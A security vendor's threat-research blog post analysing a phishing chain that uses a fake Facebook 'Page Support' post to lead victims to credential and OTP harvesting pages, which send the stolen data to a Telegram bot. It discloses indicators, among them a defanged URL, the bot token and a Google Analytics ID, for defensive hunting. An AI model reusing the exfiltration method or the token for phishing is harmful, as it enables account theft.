Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Meta-Phish: Facebook Infrastructure Used in Phishing Attack Chain

Meta has two of the largest social media platforms today, Facebook and Instagram. These platforms became the modern gateway for people not just to socialize and eavesdrop on the lives of famous personalities, but more importantly, to stay connected with their friends and loved ones. The sites also became effective channels for organizations to advertise and disseminate information. However, their global presence has made these social media sites an attractive avenue for cybercriminals to perform their nefarious deeds.

Trustwave SpiderLabs previously released two blogs about Facebook and Instagram phishing. The common denominator between these two articles is that we discuss the use of phony notifications which lure victims into thinking that they have allegedly committed a violation of terms. The victim must then make an appeal through a crafted phishing page to avoid losing access to their account. This social engineering tactic is not new, but cybercriminals are constantly innovating, creating ever more sophisticated ways to evade security controls and filters.

Recently, we came across another example that operates in the same vein, which we have dubbed Meta-Phish. A successful Meta-Phish attack could result in the loss of Personally Identifiable Information (PII), login credentials, and Facebook profile link.


Figure 1: Phishing email message

Instead of the usual phishing link to an external landing page, this mail sample is crafted with a link that points to an actual Facebook post. The content of this Facebook post appears legitimate because it uses a dummy ‘Page Support’ profile with the Facebook logo as its display picture. At first glance, the page looks legitimate, but the link provided in this post leads to an external domain.


Figure 2: Dummy ’Page Support’ profile page

The link in the post leads to this main phishing URL, hxxps://meta[.]forbusinessuser[.]xyz/main[.]php, which mimics Facebook’s copyright appeal page.


Figure 3: Fake Facebook Copyright Appeal page

Upon clicking the send button, any information entered in the form by unsuspecting victims will be sent to the cybercriminals, along with the victim’s client IP and geolocation information. Let’s look at the source code and see how this attack unfolds.

Inspecting the source code of main[.]php reveals a link to a JavaScript file which contains the function that will retrieve any information provided to its form when triggered.


Figure 4: main[.]php source code


Figure 5: index[.]js source code: Form value retrieval

Then, all the information retrieved will be sent to a Telegram account via a Telegram Bot API.


Figure 6: index[.]js source code: Telegram bot API call

All queries to this Telegram Bot API must be served over HTTPS and needs to be presented in this form: https://api.telegram[.]org/bot<token>/METHOD_NAME. From here, we can identify the unique token of the bot used in this attack: bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo.

Index.js also uses the external site to harvest the victim’s client IP address and geolocation information. This information is also sent over to the cybercriminals via the Telegram Bot API.


Figure 7: Index[.]js source code: client IP and geolocation harvest


Figure 8: Client data harvested

Finally, the user is redirected to the next page checkpoint[.]php.


Figure 9: Index[.]js source code

In this redirection phishing page hosted on the URL, a fake One Time Password (OTP) check will take place.

Based on the code, any value that the user tries to input will only lead to an error message. However, there are several functions for the timer being set for the user to input the OTP required.


Figure 10: Phishing page with OTP request

Based on the code, any value that the user tries to input will only lead to an error message. However, there are several functions for the timer being set for the user to input the OTP required.


Figure 11: checkpoint[.]php source code

If the user tries to click the option ‘Need another way to authenticate?’, a message box will appear and provide some steps on what to do next. However, if the user tries to click ‘Get Code’, it will redirect to a legitimate Facebook site that requires a log-in.


Figure 12: ‘Need another way to authenticate page

The source code of checkpoint[.]php also reveals the use of Google Analytics with the specific ID: UA-177207786-1.


Figure 13: checkpoint[.]php source code

Google Analytics is a web analytics service that tracks and reports website traffic from the Google Marketing Platform brand.

The property ID is the identifier associated with the user account and is used by Google Analytics to collect data. The UA prefix stands for ‘Universal Analytics’, which is the current version of Google Analytics. The numbers that follow are the Google Analytics account ID. The postfix number is the index number of the property connected to the account. It is possible to have up to 50 properties connected to the same Google Analytics account, so the postfix can be from 1 to 50.


Figure 14: Google Analytics ID Structure

The Google Analytics property tracking ID can be used as a part of Global Site Tag, which is provided in the admin area of the account.

Looking up this Google Analytics ID in VirusTotal will resolve to several Facebook Phishing URLs which can also be used for threat hunting purposes.


Figure 15: Sample screenshot of VirusTotal search result using Google Analytics ID

During our research, we also discovered several other phony Facebook accounts that use this social engineering technique:


Figure 16: Fake Appeal Form page



Figure 17: Fake Account Restrictions page



Figure 18: Fake Social Network Violations page



Figure 19: Fake Page Recovery Notifications page


The majority of these URLs use free web hosting sites or short URL services that redirect to the destination phishing site. Some sites also use newly registered domains which are neither affiliated with Facebook, nor Instagram.

These type of posts or pages can be easily found by searching specific keywords like ‘appeal form’ in Facebook’s search text box:


Figure 20: Text box search for Appeal Form page


To wrap up, these fake Facebook ‘Violation’ notifications use real Facebook pages to redirect to external phishing sites. Users are advised to be extra careful when receiving false violation notifications and not to be fooled by the apparent legitimacy of the initial links.




Latest SpiderLabs Blogs

Cloudy with a Chance of Hackers: Protecting Critical Cloud Workloads

If you've been following along with David's posts, you'll have noticed a structure to the topics: Part I: The Plan, Part II: The Execution and now we move into Part III: Security Operations. Things...

Read More

Trustwave Rapid Response: CrowdStrike Falcon Outage Update

Trustwave is proactively assessing and monitoring our clients who may have been impacted by CrowdStrike’s recently rolled-out update for its Windows users. The critical issue identified with...

Read More

Using AWS Secrets Manager and Lambda Function to Store, Rotate and Secure Keys

When working with Amazon Web Services (AWS), we often find that various AWS services need to store and manage secrets. AWS Secrets Manager is the go-to solution for this. It's a centralized service...

Read More